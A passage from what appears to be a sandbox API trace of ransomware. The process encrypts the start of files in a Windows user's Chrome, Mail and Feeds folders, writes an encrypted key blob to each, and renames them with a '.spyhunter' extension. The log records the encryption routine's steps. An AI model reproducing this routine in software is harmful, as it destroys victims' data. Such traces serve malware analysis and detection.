lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf1a4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf1a4*=0x30, lpOverlapped=0x0) returned 1 [0138.357] CloseHandle (hObject=0x16c) returned 1 [0138.357] GetProcessHeap () returned 0x2c0000 [0138.357] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0138.357] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run.spyhunter") returned 91 [0138.357] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\First Run.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\first run.spyhunter")) returned 1 [0138.358] GetProcessHeap () returned 0x2c0000 [0138.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0138.358] GetProcessHeap () returned 0x2c0000 [0138.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0138.358] GetProcessHeap () returned 0x2c0000 [0138.358] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c8d0a8 | out: hHeap=0x2c0000) returned 1 [0138.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1d0 | out: pbBuffer=0x25cf1d0) returned 1 [0138.390] GetProcessHeap () returned 0x2c0000 [0138.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0138.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1c8*=0x30) returned 1 [0138.390] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0138.391] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms") returned 85 [0138.391] StrStrW (lpFirst="FeedsStore.feedsdb-ms", lpSrch=".txt") returned 0x0 [0138.391] GetProcessHeap () returned 0x2c0000 [0138.391] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.391] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf18c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf18c*=0x1a00, lpOverlapped=0x0) returned 1 [0138.416] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffe600, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.416] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x25cf18c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf18c*=0x1a00, lpOverlapped=0x0) returned 1 [0138.417] GetProcessHeap () returned 0x2c0000 [0138.417] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.417] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.417] WriteFile (in: hFile=0x158, lpBuffer=0x25cf1cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf18c, lpOverlapped=0x0 | out: lpBuffer=0x25cf1cc*, lpNumberOfBytesWritten=0x25cf18c*=0x4, lpOverlapped=0x0) returned 1 [0138.417] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf18c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf18c*=0x30, lpOverlapped=0x0) returned 1 [0138.417] CloseHandle (hObject=0x158) returned 1 [0138.417] GetProcessHeap () returned 0x2c0000 [0138.417] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.417] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.spyhunter") returned 95 [0138.417] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Feeds\\FeedsStore.feedsdb-ms.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\feeds\\feedsstore.feedsdb-ms.spyhunter")) returned 1 [0138.418] GetProcessHeap () returned 0x2c0000 [0138.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.418] GetProcessHeap () returned 0x2c0000 [0138.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0138.418] GetProcessHeap () returned 0x2c0000 [0138.418] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38f40 | out: hHeap=0x2c0000) returned 1 [0138.418] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1d0 | out: pbBuffer=0x25cf1d0) returned 1 [0138.418] GetProcessHeap () returned 0x2c0000 [0138.418] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0138.419] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1c8*=0x30) returned 1 [0138.419] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0138.420] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal") returned 97 [0138.420] StrStrW (lpFirst="Top Sites-journal", lpSrch=".txt") returned 0x0 [0138.420] GetProcessHeap () returned 0x2c0000 [0138.420] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.420] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf18c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf18c*=0x0, lpOverlapped=0x0) returned 1 [0138.420] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.420] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x25cf18c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf18c*=0x0, lpOverlapped=0x0) returned 1 [0138.420] GetProcessHeap () returned 0x2c0000 [0138.420] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.420] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.421] WriteFile (in: hFile=0x158, lpBuffer=0x25cf1cc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf18c, lpOverlapped=0x0 | out: lpBuffer=0x25cf1cc*, lpNumberOfBytesWritten=0x25cf18c*=0x4, lpOverlapped=0x0) returned 1 [0138.421] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf18c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf18c*=0x30, lpOverlapped=0x0) returned 1 [0138.422] CloseHandle (hObject=0x158) returned 1 [0138.422] GetProcessHeap () returned 0x2c0000 [0138.422] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f07c68 [0138.422] wnsprintfW (in: pszDest=0x2f07c68, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal.spyhunter") returned 107 [0138.422] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites-journal.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites-journal.spyhunter")) returned 1 [0138.423] GetProcessHeap () returned 0x2c0000 [0138.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f07c68 | out: hHeap=0x2c0000) returned 1 [0138.423] GetProcessHeap () returned 0x2c0000 [0138.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0138.423] GetProcessHeap () returned 0x2c0000 [0138.423] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2a4c0 | out: hHeap=0x2c0000) returned 1 [0138.423] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1c8 | out: pbBuffer=0x25cf1c8) returned 1 [0138.423] GetProcessHeap () returned 0x2c0000 [0138.423] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0138.423] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1c0*=0x30) returned 1 [0138.423] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0138.423] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites") returned 89 [0138.424] StrStrW (lpFirst="Top Sites", lpSrch=".txt") returned 0x0 [0138.424] GetProcessHeap () returned 0x2c0000 [0138.424] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.424] ReadFile (in: hFile=0x158, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf184, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf184*=0x2800, lpOverlapped=0x0) returned 1 [0138.511] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0138.512] WriteFile (in: hFile=0x158, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf184, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf184*=0x2800, lpOverlapped=0x0) returned 1 [0138.512] GetProcessHeap () returned 0x2c0000 [0138.512] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0138.512] SetFilePointerEx (in: hFile=0x158, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0138.512] WriteFile (in: hFile=0x158, lpBuffer=0x25cf1c4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf184, lpOverlapped=0x0 | out: lpBuffer=0x25cf1c4*, lpNumberOfBytesWritten=0x25cf184*=0x4, lpOverlapped=0x0) returned 1 [0138.512] WriteFile (in: hFile=0x158, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf184, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf184*=0x30, lpOverlapped=0x0) returned 1 [0138.512] CloseHandle (hObject=0x158) returned 1 [0138.587] GetProcessHeap () returned 0x2c0000 [0138.587] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0138.587] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites.spyhunter") returned 99 [0138.587] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Top Sites.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\top sites.spyhunter")) returned 1 [0138.588] GetProcessHeap () returned 0x2c0000 [0138.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0138.588] GetProcessHeap () returned 0x2c0000 [0138.588] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0138.588] GetProcessHeap () returned 0x2c0000 [0138.589] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44e28 | out: hHeap=0x2c0000) returned 1 [0138.658] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1c0 | out: pbBuffer=0x25cf1c0) returned 1 [0138.658] GetProcessHeap () returned 0x2c0000 [0138.658] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0138.658] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1b8*=0x30) returned 1 [0138.658] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0138.987] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs") returned 86 [0138.987] StrStrW (lpFirst="edbres00002.jrs", lpSrch=".txt") returned 0x0 [0138.987] GetProcessHeap () returned 0x2c0000 [0138.987] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0138.987] ReadFile (in: hFile=0x154, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf17c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf17c*=0x2800, lpOverlapped=0x0) returned 1 [0139.034] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.035] WriteFile (in: hFile=0x154, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf17c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf17c*=0x2800, lpOverlapped=0x0) returned 1 [0139.035] GetProcessHeap () returned 0x2c0000 [0139.035] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.035] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.035] WriteFile (in: hFile=0x154, lpBuffer=0x25cf1bc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf17c, lpOverlapped=0x0 | out: lpBuffer=0x25cf1bc*, lpNumberOfBytesWritten=0x25cf17c*=0x4, lpOverlapped=0x0) returned 1 [0139.037] WriteFile (in: hFile=0x154, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf17c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf17c*=0x30, lpOverlapped=0x0) returned 1 [0139.037] CloseHandle (hObject=0x154) returned 1 [0139.045] GetProcessHeap () returned 0x2c0000 [0139.045] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.045] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.spyhunter") returned 96 [0139.045] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\edbres00002.jrs.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\edbres00002.jrs.spyhunter")) returned 1 [0139.046] GetProcessHeap () returned 0x2c0000 [0139.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.046] GetProcessHeap () returned 0x2c0000 [0139.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.046] GetProcessHeap () returned 0x2c0000 [0139.046] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f39700 | out: hHeap=0x2c0000) returned 1 [0139.047] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1b8 | out: pbBuffer=0x25cf1b8) returned 1 [0139.048] GetProcessHeap () returned 0x2c0000 [0139.048] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.048] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1b0*=0x30) returned 1 [0139.048] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.049] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore") returned 97 [0139.049] StrStrW (lpFirst="WindowsMail.MSMessageStore", lpSrch=".txt") returned 0x0 [0139.049] GetProcessHeap () returned 0x2c0000 [0139.049] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0139.049] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf174, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf174*=0x2800, lpOverlapped=0x0) returned 1 [0139.056] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.056] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25cf174, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf174*=0x2800, lpOverlapped=0x0) returned 1 [0139.057] GetProcessHeap () returned 0x2c0000 [0139.057] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.057] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.057] WriteFile (in: hFile=0xec, lpBuffer=0x25cf1b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf174, lpOverlapped=0x0 | out: lpBuffer=0x25cf1b4*, lpNumberOfBytesWritten=0x25cf174*=0x4, lpOverlapped=0x0) returned 1 [0139.060] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf174, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25cf174*=0x30, lpOverlapped=0x0) returned 1 [0139.060] CloseHandle (hObject=0xec) returned 1 [0139.060] GetProcessHeap () returned 0x2c0000 [0139.060] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0139.060] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.spyhunter") returned 107 [0139.060] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\WindowsMail.MSMessageStore.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\windowsmail.msmessagestore.spyhunter")) returned 1 [0139.061] GetProcessHeap () returned 0x2c0000 [0139.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0139.061] GetProcessHeap () returned 0x2c0000 [0139.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0139.061] GetProcessHeap () returned 0x2c0000 [0139.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f2bbb8 | out: hHeap=0x2c0000) returned 1 [0139.061] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf1b8 | out: pbBuffer=0x25cf1b8) returned 1 [0139.061] GetProcessHeap () returned 0x2c0000 [0139.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0139.061] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25cf1b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25cf1b0*=0x30) returned 1 [0139.061] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\microsoft\\windows mail\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xec [0139.062] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Microsoft\\Windows Mail\\Stationery\\Stars.htm") returned 91 [0139.062] StrStrW (lpFirst="Stars.htm", lpSrch=".txt") returned 0x0 [0139.062] GetProcessHeap () returned 0x2c0000 [0139.062] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0139.062] ReadFile (in: hFile=0xec, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf174, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25cf174*=0xe6, lpOverlapped=0x0) returned 1 [0139.063] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0xffffff1a, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.063] WriteFile (in: hFile=0xec, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x25cf174, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25cf174*=0xe6, lpOverlapped=0x0) returned 1 [0139.063] GetProcessHeap () returned 0x2c0000 [0139.063] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0139.063] SetFilePointerEx (in: hFile=0xec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.063] WriteFile (in: hFile=0xec, lpBuffer=0x25cf1b4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf174, lpOverlapped=0x0 | out: lpBuffer=0x25cf1b4*, lpNumberOfBytesWritten=0x25cf174*=0x4, lpOverlapped=0x0) returned 1 [0139.064] WriteFile (in: hFile=0xec, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, 